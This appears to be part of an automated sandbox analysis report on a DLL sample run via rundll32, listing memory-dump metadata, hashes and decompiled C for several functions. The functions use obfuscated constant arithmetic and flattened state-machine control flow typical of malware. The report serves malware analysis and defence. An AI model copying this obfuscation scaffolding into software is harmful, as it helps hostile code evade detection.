                                                                                                                                    0x002d85a3
                                                                                                                                    0x002d85aa
                                                                                                                                    0x002d85b1
                                                                                                                                    0x002d85b8
                                                                                                                                    0x002d85bf
                                                                                                                                    0x002d85c6
                                                                                                                                    0x002d85cd
                                                                                                                                    0x002d85d4
                                                                                                                                    0x002d85db
                                                                                                                                    0x002d8605

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 8
                                                                                                                                    • API String ID: 0-719543824
                                                                                                                                    • Opcode ID: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                                    • Instruction ID: a832ba77ed6089d174f58dabe8fcb4271001d7f7e35a774cf15270daa113d657
                                                                                                                                    • Opcode Fuzzy Hash: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                                    • Instruction Fuzzy Hash: 0A21A2B5C00209EBCF48DFE5CA8689EBFB5FF40314F6081899411B6261D3B54B549F95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100323E2 Relevance: .4, Instructions: 384COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                    • Instruction ID: 1bfcaf43c27c81d10410876f8fc1d5c1a29ddf16da4e3393733b86403839c423
                                                                                                                                    • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                    • Instruction Fuzzy Hash: 2CD15C73C0E9F70E8377C12E506866AEAB2AFC298271FC3E1DCD42F689D2265D1195D0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10031FC2 Relevance: .4, Instructions: 378COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                    • Instruction ID: 82a22fea4dee095689a33f7c41869eea601d71afe1f9cce3cb1ebeaf0be2af07
                                                                                                                                    • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                    • Instruction Fuzzy Hash: 0BD16A73C0E9B70E8376C12E54A866BEAB2AFC158271FC3A1DCD02F689D6269D0595D0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10031BB6 Relevance: .4, Instructions: 361COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                    • Instruction ID: 4b1b82cb2a868ffe554c354e232f2920846bc0ab95f092044db9cceed5b195f9
                                                                                                                                    • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                    • Instruction Fuzzy Hash: 3BC17F77C1E9B70E8377C12E44A85AAEAB2AFC659271FC3E1CCD43F689D2265D0185D0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100317E2 Relevance: .4, Instructions: 351COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                    • Instruction ID: b56b4bdd56439ea2f6f9f3f119f05c546accd6e672066d429c0e352e3a467874
                                                                                                                                    • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                    • Instruction Fuzzy Hash: 58C18273D0E9B70E8377C12E44A85AAEEB2AFC558271FC3E1CCD42F289E6265D0595D0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C4346 Relevance: .2, Instructions: 173COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E002C4346(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				void* _t146;
				void* _t165;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				void* _t177;
				intOrPtr* _t196;
				void* _t197;
				signed int* _t200;

				_push(_a8);
				_t196 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t146);
				_v8 = 0x1587dd;
				_t200 =  &(( &_v72)[4]);
				_t197 = 0;
				_v4 = _v4 & 0;
				_t177 = 0x762b00a;
				_v40 = 0x54d1b5;
				_t170 = 0x79;
				_v40 = _v40 / _t170;
				_v40 = _v40 ^ 0x0000b372;
				_v16 = 0xa1afdd;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000050c;
				_v68 = 0x910a11;
				_t171 = 0x13;
				_v68 = _v68 / _t171;
				_v68 = _v68 << 2;
				_v68 = _v68 + 0x13e3;
				_v68 = _v68 ^ 0x00184f98;
				_v32 = 0xaf4665;
				_t172 = 0x26;
				_v32 = _v32 * 0x1c;
				_v32 = _v32 ^ 0x13220c8d;
				_v56 = 0xf39368;
				_v56 = _v56 + 0xf012;
				_v56 = _v56 / _t172;
				_v56 = _v56 ^ 0x000d8e66;
				_v36 = 0xa121b7;
				_v36 = _v36 + 0x3186;
				_v36 = _v36 ^ 0x00aec580;
				_v72 = 0x8bd634;
				_t173 = 0x16;
				_v72 = _v72 / _t173;
				_v72 = _v72 | 0xc3992ef3;
				_v72 = _v72 + 0xf49;
				_v72 = _v72 ^ 0xc3912c07;
				_v24 = 0xbc86c6;
				_v24 = _v24 | 0x4f3bdf6c;
				_v24 = _v24 ^ 0x4fbb36fd;
				_v64 = 0xf11315;
				_v64 = _v64 | 0x791eed70;
				_v64 = _v64 + 0xffff781b;
				_v64 = _v64 | 0xb4748ed7;
				_v64 = _v64 ^ 0xfdf43fb6;
				_v28 = 0xa9ea5e;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x53d38433;
				_v44 = 0xab8ea7;
				_t174 = 0x5e;
				_v44 = _v44 / _t174;
				_v44 = _v44 >> 5;
				_v44 = _v44 ^ 0x00061aeb;
				_v48 = 0xf3254f;
				_v48 = _v48 + 0xffff7d1c;
				_v48 = _v48 ^ 0x338af708;
				_v48 = _v48 ^ 0x337c7814;
				_v60 = 0xe02c97;
				_v60 = _v60 * 0x4f;
				_v60 = _v60 + 0xffffa06e;
				_v60 = _v60 + 0x8165;
				_v60 = _v60 ^ 0x4522059f;
				_v52 = 0x13fe8b;
				_v52 = _v52 >> 6;
				_v52 = _v52 + 0xffffbd6d;
				_v52 = _v52 ^ 0x000eeb0b;
				_v20 = 0x7ee5fd;
				_v20 = _v20 | 0xb1050693;
				_v20 = _v20 ^ 0xb17ba1e4;
				do {
					while(_t177 != 0x29b5a10) {
						if(_t177 == 0x761c4cc) {
							_push(_t177);
							_t165 = E002CAE64(_v68, _t177, _a4, 0, _v56, _t177, _v36,  &_v12, _v40, _v72);
							_t200 =  &(_t200[0xa]);
							if(_t165 != 0) {
								_t177 = 0x29b5a10;
								continue;
							}
						} else {
							if(_t177 == 0x762b00a) {
								_t177 = 0x761c4cc;
								continue;
							} else {
								if(_t177 != 0x7f1be9f) {
									goto L13;
								} else {
									_push(_t177);
									E002CAE64(_v44, _t177, _a4, _t197, _v60, _t177, _v52,  &_v12, _v16, _v20);
									 *_t196 = _v12;
								}
							}
						}
						L6:
						return _t197;
					}
					_push(_t177);
					_push(_t177);
					_t197 = E002C7FF2(_v12);
					if(_t197 == 0) {
						_t177 = 0xc410c1b;
						goto L13;
					} else {
						_t177 = 0x7f1be9f;
						continue;
					}
					goto L6;
					L13:
				} while (_t177 != 0xc410c1b);
				goto L6;
			}
































                                                                                                                                    0x002c434d
                                                                                                                                    0x002c4351
                                                                                                                                    0x002c4353
                                                                                                                                    0x002c4357
                                                                                                                                    0x002c4358
                                                                                                                                    0x002c4359
                                                                                                                                    0x002c435e
                                                                                                                                    0x002c4366
                                                                                                                                    0x002c436b
                                                                                                                                    0x002c436d
                                                                                                                                    0x002c4371
                                                                                                                                    0x002c4376
                                                                                                                                    0x002c4384
                                                                                                                                    0x002c4389
                                                                                                                                    0x002c438f
                                                                                                                                    0x002c4397
                                                                                                                                    0x002c439f
                                                                                                                                    0x002c43a4
                                                                                                                                    0x002c43ac
                                                                                                                                    0x002c43b8
                                                                                                                                    0x002c43bd
                                                                                                                                    0x002c43c3
                                                                                                                                    0x002c43c8
                                                                                                                                    0x002c43d0
                                                                                                                                    0x002c43d8
                                                                                                                                    0x002c43e5
                                                                                                                                    0x002c43e8
                                                                                                                                    0x002c43ec
                                                                                                                                    0x002c43f4
                                                                                                                                    0x002c43fc
                                                                                                                                    0x002c440c
                                                                                                                                    0x002c4410
                                                                                                                                    0x002c4418
                                                                                                                                    0x002c4420
                                                                                                                                    0x002c4428
                                                                                                                                    0x002c4430
                                                                                                                                    0x002c443c
                                                                                                                                    0x002c4441
                                                                                                                                    0x002c4447
                                                                                                                                    0x002c444f
                                                                                                                                    0x002c4457
                                                                                                                                    0x002c445f
                                                                                                                                    0x002c4467
                                                                                                                                    0x002c446f
                                                                                                                                    0x002c4477
                                                                                                                                    0x002c447f
                                                                                                                                    0x002c4487
                                                                                                                                    0x002c448f
                                                                                                                                    0x002c4497
                                                                                                                                    0x002c449f
                                                                                                                                    0x002c44a7
                                                                                                                                    0x002c44ac
                                                                                                                                    0x002c44b4
                                                                                                                                    0x002c44c0
                                                                                                                                    0x002c44c3
                                                                                                                                    0x002c44c7
                                                                                                                                    0x002c44cc
                                                                                                                                    0x002c44d9
                                                                                                                                    0x002c44e6
                                                                                                                                    0x002c44ee
                                                                                                                                    0x002c44f6
                                                                                                                                    0x002c44fe
                                                                                                                                    0x002c450b
                                                                                                                                    0x002c450f
                                                                                                                                    0x002c4517
                                                                                                                                    0x002c451f
                                                                                                                                    0x002c4527
                                                                                                                                    0x002c452f
                                                                                                                                    0x002c4534
                                                                                                                                    0x002c453c
                                                                                                                                    0x002c4544
                                                                                                                                    0x002c454c
                                                                                                                                    0x002c4554
                                                                                                                                    0x002c455c
                                                                                                                                    0x002c455c
                                                                                                                                    0x002c4566
                                                                                                                                    0x002c45bd
                                                                                                                                    0x002c45e3
                                                                                                                                    0x002c45e8
                                                                                                                                    0x002c45ed
                                                                                                                                    0x002c45ef
                                                                                                                                    0x00000000
                                                                                                                                    0x002c45ef
                                                                                                                                    0x002c4568
                                                                                                                                    0x002c456e
                                                                                                                                    0x002c45b9
                                                                                                                                    0x00000000
                                                                                                                                    0x002c4570
                                                                                                                                    0x002c4576
                                                                                                                                    0x00000000
                                                                                                                                    0x002c457c
                                                                                                                                    0x002c457c
                                                                                                                                    0x002c45a1
                                                                                                                                    0x002c45ad
                                                                                                                                    0x002c45ad
                                                                                                                                    0x002c4576
                                                                                                                                    0x002c456e
                                                                                                                                    0x002c45b0
                                                                                                                                    0x002c45b8
                                                                                                                                    0x002c45b8
                                                                                                                                    0x002c4606
                                                                                                                                    0x002c4607
                                                                                                                                    0x002c460d
                                                                                                                                    0x002c4613
                                                                                                                                    0x002c461f
                                                                                                                                    0x00000000
                                                                                                                                    0x002c4615
                                                                                                                                    0x002c4615
                                                                                                                                    0x00000000
                                                                                                                                    0x002c4615
                                                                                                                                    0x00000000
                                                                                                                                    0x002c4624
                                                                                                                                    0x002c4624
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                                    • Instruction ID: 65772eb5183ad3fa3dca97f192e152b5e210966dbfea031e2e65e363c0d8051b
                                                                                                                                    • Opcode Fuzzy Hash: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                                    • Instruction Fuzzy Hash: 807154B21193019FD358DF21C98992BBBF1EBD4758F50890DF29556260D3B2C919CF83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D894B Relevance: .1, Instructions: 128COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E002D894B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t97;
				void* _t111;
				void* _t115;
				void* _t117;
				void* _t135;
				void* _t136;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				void* _t142;
				void* _t143;

				_push(_a16);
				_t115 = __edx;
				_t135 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t97);
				_v64 = 0x51cd23;
				_t143 = _t142 + 0x18;
				_t136 = 0;
				_t117 = 0x1f0121b;
				_t137 = 0x4d;
				_v64 = _v64 / _t137;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0x00032222;
				_v68 = 0xd4b8b7;
				_v68 = _v68 + 0xffffd2af;
				_v68 = _v68 ^ 0xd36e67b3;
				_v68 = _v68 ^ 0xd3b4aa1e;
				_v76 = 0x6efd74;
				_v76 = _v76 << 5;
				_v76 = _v76 ^ 0x2f6bad1f;
				_t138 = 0x34;
				_v76 = _v76 / _t138;
				_v76 = _v76 ^ 0x00af6c6b;
				_v52 = 0x9958c4;
				_v52 = _v52 + 0xffff4241;
				_v52 = _v52 ^ 0x009a50fc;
				_v56 = 0x2e84bf;
				_t139 = 0x72;
				_v56 = _v56 * 0x77;
				_v56 = _v56 ^ 0x15969b56;
				_v80 = 0x2bfbd3;
				_v80 = _v80 | 0xbb654ab5;
				_v80 = _v80 * 0x48;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x00b72d27;
				_v60 = 0xb8f349;
				_v60 = _v60 / _t139;
				_v60 = _v60 ^ 0xcb885b35;
				_v60 = _v60 ^ 0xcb801a24;
				_v72 = 0xbf562d;
				_t140 = 0x42;
				_v72 = _v72 / _t140;
				_v72 = _v72 ^ 0xd5944d41;
				_v72 = _v72 ^ 0x4a8545c0;
				_v72 = _v72 ^ 0x9f1c34cb;
				_v48 = 0xda7c79;
				_v48 = _v48 << 0xc;
				_v48 = _v48 ^ 0xa7c49699;
				do {
					while(_t117 != 0x1f0121b) {
						if(_t117 == 0x20f75ec) {
							E002C3DBC( &_v44, _t115, _v64, _v68, _v76);
							_t143 = _t143 + 0xc;
							_t117 = 0x98c428b;
							continue;
						} else {
							if(_t117 == 0x98c428b) {
								_t111 = E002C2A21(_v52, _v56,  &_v44, _t135, _v80);
								_t143 = _t143 + 0xc;
								__eflags = _t111;
								if(__eflags != 0) {
									_t117 = 0xea94eac;
									continue;
								}
							} else {
								_t149 = _t117 - 0xea94eac;
								if(_t117 != 0xea94eac) {
									goto L11;
								} else {
									E002DD97D( &_v44, _v60, _t149, _v72, _t135 + 4, _v48);
									_t136 =  !=  ? 1 : _t136;
								}
							}
						}
						L6:
						return _t136;
					}
					_t117 = 0x20f75ec;
					L11:
					__eflags = _t117 - 0x3544eb3;
				} while (__eflags != 0);
				goto L6;
			}

























                                                                                                                                    0x002d8952
                                                                                                                                    0x002d8956
                                                                                                                                    0x002d8958
                                                                                                                                    0x002d895a
                                                                                                                                    0x002d895e
                                                                                                                                    0x002d8962
                                                                                                                                    0x002d8966
                                                                                                                                    0x002d8967
                                                                                                                                    0x002d8968
                                                                                                                                    0x002d896d
                                                                                                                                    0x002d8975
                                                                                                                                    0x002d897e
                                                                                                                                    0x002d8980
                                                                                                                                    0x002d8987
                                                                                                                                    0x002d898c
                                                                                                                                    0x002d8992
                                                                                                                                    0x002d8997
                                                                                                                                    0x002d899f
                                                                                                                                    0x002d89a7
                                                                                                                                    0x002d89af
                                                                                                                                    0x002d89b7
                                                                                                                                    0x002d89bf
                                                                                                                                    0x002d89c7
                                                                                                                                    0x002d89cc
                                                                                                                                    0x002d89d8
                                                                                                                                    0x002d89dd
                                                                                                                                    0x002d89e3
                                                                                                                                    0x002d89eb
                                                                                                                                    0x002d89f3
                                                                                                                                    0x002d89fb
                                                                                                                                    0x002d8a03
                                                                                                                                    0x002d8a10
                                                                                                                                    0x002d8a13
                                                                                                                                    0x002d8a17
                                                                                                                                    0x002d8a1f
                                                                                                                                    0x002d8a27
                                                                                                                                    0x002d8a34
                                                                                                                                    0x002d8a38
                                                                                                                                    0x002d8a3d
                                                                                                                                    0x002d8a45
                                                                                                                                    0x002d8a55
                                                                                                                                    0x002d8a59
                                                                                                                                    0x002d8a61
                                                                                                                                    0x002d8a69
                                                                                                                                    0x002d8a75
                                                                                                                                    0x002d8a7d
                                                                                                                                    0x002d8a81
                                                                                                                                    0x002d8a89
                                                                                                                                    0x002d8a91
                                                                                                                                    0x002d8a99
                                                                                                                                    0x002d8aa1
                                                                                                                                    0x002d8aa6
                                                                                                                                    0x002d8aae
                                                                                                                                    0x002d8aae
                                                                                                                                    0x002d8abc
                                                                                                                                    0x002d8b33
                                                                                                                                    0x002d8b38
                                                                                                                                    0x002d8b3b
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8abe
                                                                                                                                    0x002d8ac4
                                                                                                                                    0x002d8b0e
                                                                                                                                    0x002d8b13
                                                                                                                                    0x002d8b16
                                                                                                                                    0x002d8b18
                                                                                                                                    0x002d8b1a
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8b1a
                                                                                                                                    0x002d8ac6
                                                                                                                                    0x002d8ac6
                                                                                                                                    0x002d8acc
                                                                                                                                    0x00000000
                                                                                                                                    0x002d8ace
                                                                                                                                    0x002d8ae2
                                                                                                                                    0x002d8aef
                                                                                                                                    0x002d8aef
                                                                                                                                    0x002d8acc
                                                                                                                                    0x002d8ac4
                                                                                                                                    0x002d8af3
                                                                                                                                    0x002d8afb
                                                                                                                                    0x002d8afb
                                                                                                                                    0x002d8b45
                                                                                                                                    0x002d8b47
                                                                                                                                    0x002d8b47
                                                                                                                                    0x002d8b47
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                                    • Instruction ID: c43aa6a3270fbc676ea364345c1784c08dd3a6f5701cb4cfe99c4f078502c13a
                                                                                                                                    • Opcode Fuzzy Hash: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                                    • Instruction Fuzzy Hash: 1C518872108301AFC754CF22C98681BBBE5FBD8748F50992EF59596260D772CA29CF87
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002DAC3A Relevance: .1, Instructions: 89COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                    			E002DAC3A(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t82;
				signed int _t85;
				signed int _t86;
				void* _t88;
				void* _t96;
				void* _t97;
				signed int* _t99;

				_t88 = __ecx;
				_t99 =  &_v28;
				_v24 = 0x5aa995;
				_v24 = _v24 | 0x25663b9c;
				_v24 = _v24 << 6;
				_t85 = 0x11;
				_v24 = _v24 / _t85;
				_t96 = 0;
				_v24 = _v24 ^ 0x05a97123;
				_t97 = 0xfe6f9f;
				_v16 = 0x9f09af;
				_v16 = _v16 + 0xcb37;
				_v16 = _v16 ^ 0x3a843722;
				_v16 = _v16 ^ 0x3a14bc19;
				_v28 = 0x7e93e4;
				_v28 = _v28 << 0xa;
				_t86 = 0x1a;
				_v28 = _v28 / _t86;
				_v28 = _v28 ^ 0x4056cd73;
				_v28 = _v28 ^ 0x49f3cf3d;
				_v4 = 0x47c602;
				_v4 = _v4 ^ 0xe3aa640e;
				_v4 = _v4 | 0xd85731ad;
				_v4 = _v4 ^ 0xfbf46e2b;
				_v8 = 0x201e29;
				_v8 = _v8 << 0x10;
				_v8 = _v8 * 0x48;
				_v8 = _v8 ^ 0x7b8200e2;
				_v12 = 0x18f9c1;
				_v12 = _v12 * 0x54;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x0c72dcb8;
				_v20 = 0xd6b502;
				_v20 = _v20 * 0x55;
				_v20 = _v20 << 0xd;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x00034ef9;
				do {
					while(_t97 != 0xfe6f9f) {
						if(_t97 == 0x2f82a60) {
							_push(_t88);
							_push(_t88);
							_t82 = E002C474B();
							_t99 =  &(_t99[2]);
							_t97 = 0x6e030e4;
							_t96 = _t96 + _t82;
							continue;
						} else {
							if(_t97 != 0x6e030e4) {
								goto L8;
							} else {
								_t96 = _t96 + E002DC2F8(_v4, _t88 + 4, _v8, _v12, _v20);
							}
						}
						L5:
						return _t96;
					}
					_t97 = 0x2f82a60;
					L8:
				} while (_t97 != 0xea6061f);
				goto L5;
			}

















                                                                                                                                    0x002dac3a
                                                                                                                                    0x002dac3a
                                                                                                                                    0x002dac3d
                                                                                                                                    0x002dac47
                                                                                                                                    0x002dac4f
                                                                                                                                    0x002dac5e
                                                                                                                                    0x002dac68
                                                                                                                                    0x002dac6c
                                                                                                                                    0x002dac6e
                                                                                                                                    0x002dac76
                                                                                                                                    0x002dac78
                                                                                                                                    0x002dac80
                                                                                                                                    0x002dac88
                                                                                                                                    0x002dac90
                                                                                                                                    0x002dac98
                                                                                                                                    0x002daca0
                                                                                                                                    0x002dacab
                                                                                                                                    0x002dacb8
                                                                                                                                    0x002dacbc
                                                                                                                                    0x002dacc4
                                                                                                                                    0x002daccc
                                                                                                                                    0x002dacd4
                                                                                                                                    0x002dacdc
                                                                                                                                    0x002dace4
                                                                                                                                    0x002dacec
                                                                                                                                    0x002dacf4
                                                                                                                                    0x002dacfe
                                                                                                                                    0x002dad02
                                                                                                                                    0x002dad0a
                                                                                                                                    0x002dad17
                                                                                                                                    0x002dad1b
                                                                                                                                    0x002dad20
                                                                                                                                    0x002dad28
                                                                                                                                    0x002dad35
                                                                                                                                    0x002dad39
                                                                                                                                    0x002dad3e
                                                                                                                                    0x002dad43
                                                                                                                                    0x002dad4b
                                                                                                                                    0x002dad4b
                                                                                                                                    0x002dad51
                                                                                                                                    0x002dad8a
                                                                                                                                    0x002dad8b
                                                                                                                                    0x002dad8c
                                                                                                                                    0x002dad91
                                                                                                                                    0x002dad94
                                                                                                                                    0x002dad96
                                                                                                                                    0x00000000
                                                                                                                                    0x002dad53
                                                                                                                                    0x002dad55
                                                                                                                                    0x00000000
                                                                                                                                    0x002dad57
                                                                                                                                    0x002dad72
                                                                                                                                    0x002dad72
                                                                                                                                    0x002dad55
                                                                                                                                    0x002dad74
                                                                                                                                    0x002dad7d
                                                                                                                                    0x002dad7d
                                                                                                                                    0x002dad9a
                                                                                                                                    0x002dad9c
                                                                                                                                    0x002dad9c
                                                                                                                                    0x00000000

